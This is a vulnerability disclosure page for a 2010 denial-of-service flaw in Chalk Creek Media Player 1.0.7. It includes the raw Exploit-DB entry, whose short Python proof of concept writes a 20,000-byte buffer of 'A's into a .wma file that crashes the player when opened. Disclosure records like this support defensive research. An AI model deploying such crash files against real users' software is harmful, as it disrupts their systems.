Chalk Creek Media Player 1.0.7 .mp3 and .wma DOS

vendor:

Chalk Creek Media Player

by:

Carlos Mario Penagos Hollmann

7,5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Chalk Creek Media Player

Affected Version From: 1.0.7

Affected Version To: 1.0.7

Patch Exists: Yes

Related CWE: N/A

CPE: a:chalk_creek_software:chalk_creek_media_player

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP

2010

Chalk Creek Media Player 1.0.7 .mp3 and .wma DOS

Chalk Creek Media Player 1.0.7 is vulnerable to a Denial of Service attack when a specially crafted .wma or .mp3 file is opened. The attack can be triggered by launching the application and selecting the specially crafted file. The attack causes the application to crash.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Chalk Creek Media Player 1.0.7 .mp3 and .wma  DOS 
# Date: September 16 2010
# Author: Carlos Mario Penagos Hollmann 
# Software Link: http://download.cnet.com/3001-2139_4-10526196.html?spi=a1e3adfe2f3af811074a43111c901f6c
# Version: 1.0.7
# Tested on: Windows xp sp3 running on VMware Fusion 3.1
# CVE : 


#    ________  _    _________   ____ __ _____   ________
#   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
#  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __ 
# / /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ / 
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/  

# COLOMBIA presents.............
#
#Carlos Mario Penagos Hollmann A.K.A Elvenking  shogilord@gmail.com
#	
#Trigger:Launch app, File Selection--->Add individual music files..booooom
#works with .wma and .mp3
#
#PEACE TO COLOMBIA no more WAR!!
#

buff = "\x41" * 20000
magic = open("DOS.wma","w")
magic.write(buff)
magic.close()